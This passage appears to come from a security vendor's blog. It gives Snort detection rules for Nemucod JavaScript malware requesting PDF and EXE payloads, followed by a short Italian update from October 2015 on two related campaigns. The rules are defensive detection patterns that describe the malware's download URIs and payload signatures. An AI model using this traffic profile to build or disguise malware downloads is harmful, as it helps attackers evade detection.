alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"CERTEGO MALWARE JS/Nemucod.M.gen requesting PDF payload"; flow:to_server,established; content:"GET"; http_method; content:".php?"; http_uri; nocase; content:"key="; http_uri; nocase; content:"pdf="; http_uri; nocase; content:!"Referer|3a| "; nocase; http_header; pcre:"/\/get(_new)?\.php\?[a-zA-Z]{4,}=0\.[0-9]{10,}&key=[a-zA-Z0-9]{4,}&pdf=[a-zA-Z]{4,}$/U"; flowbits:set,CERTEGO.nemucod.pdfrequest; classtype:trojan-activity; sid:9000102; rev:2;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"CERTEGO MALWARE JS/Nemucod.M.gen downloading EXE payload"; flow:from_server,established; flowbits:isset,CERTEGO.nemucod.exerequest; file_data; content:"MZ"; within:2; byte_jump:4,58,relative,little; content:"PE|00 00|"; fast_pattern; distance:-64; within:4; classtype:trojan-activity; sid:9000103; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"CERTEGO MALWARE JS/Nemucod.M.gen downloading PDF payload"; flow:from_server,established; flowbits:isset,CERTEGO.nemucod.pdfrequest; file_data; content:"%PDF-"; within:5; classtype:trojan-activity; sid:9000104; rev:1;)

Aggiornamento 16 Ottobre 2015

Una analisi approfondita del traffico rilevato ieri permette di mostrare che le nuove campagne erano in realtà due: una con ID 1410DTIT e un'altra con ID 14IT10M. I  timestamp mostrano che 14IT10M è stata distribuita probabilmente qualche ora dopo 1410DTIT. Per entrambe rimangono valide le signature Snort che abbiamo rilasciato ieri e che sono incluse nella release odierna di Emerging Threats.